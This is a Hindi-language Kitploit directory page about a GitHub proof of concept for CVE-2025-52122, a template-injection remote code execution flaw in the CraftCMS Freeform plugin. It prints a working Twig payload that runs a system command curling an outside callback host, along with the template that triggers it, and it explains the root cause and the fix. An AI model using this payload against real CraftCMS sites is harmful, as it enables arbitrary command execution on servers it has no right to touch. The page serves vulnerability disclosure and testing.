Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-52122 — CraftCMS Freeform 5.0.0 < 5.10.16 में मनमाना कोड इंजेक्शन | Kitploit
उपकरण/GitHubGitHub/timtrademark/cve-2025-52122
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubtimtrademark/cve-2025-52122

CVE-2025-52122

CraftCMS Freeform 5.0.0 < 5.10.16 में मनमाना कोड इंजेक्शन

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE CraftCMS Freeform

CraftCMS Freeform में एक SSTI कमजोरी है, जिसके परिणामस्वरूप उन सभी उपयोगकर्ताओं के लिए मनमाना कोड इंजेक्शन हो सकता है जिनके पास फॉर्म (सबमिशन शीर्षक) को संपादित करने का अधिकार है।

कमजोर संस्करण v5.0.0 < v5.10.16 हैं।

पुनरुत्पादन के चरण

एक फॉर्म बनाएँ:

create a form

मैंने यहाँ एक प्रमाण-अवधारणा के रूप में "pentest" फॉर्म बनाया। इसके बाद, सेटिंग्स में निम्नलिखित सबमिशन शीर्षक सेट करें (डोमेन नाम को अपने स्वयं के सर्वर में बदलें):

root@kitploit:~
{{ 'system' | call('curl http://gwgyynafr4feu5xecukf1h2nqew5kw8l.oastify.com/rce') }}

submission title

यह एक मनमाना सिस्टम कॉल निष्पादित करेगा। इस मामले में, मैं एक नियंत्रित सर्वर पर कर्ल करता हूँ जो मुझे आने वाले कनेक्शनों के बारे में सूचित करेगा। इसके बाद, इस फॉर्म को एक टेम्पलेट/पेज में शामिल करें और सबमिट करें:

root@kitploit:~
<h1>test</h1>
{% set form = freeform.form('pentest') %}

{% if form %}
  {{ form.render() }}
{% else %}
  <p>Form not found.</p>
{% endif %}

इससे कर्ल कमांड कॉल हो जाएगा। हम बनाए गए आने वाले HTTP अनुरोध को देखकर इसकी पुष्टि कर सकते हैं:

incoming connection

इस समस्या का मूल कारण यह है कि Freeform "call" Twig फ़िल्टर को उपयोगकर्ता इनपुट को मान्य किए बिना लागू करता है। इसे निम्नलिखित कमिट में ठीक किया गया था।

टूल डाउनलोड करें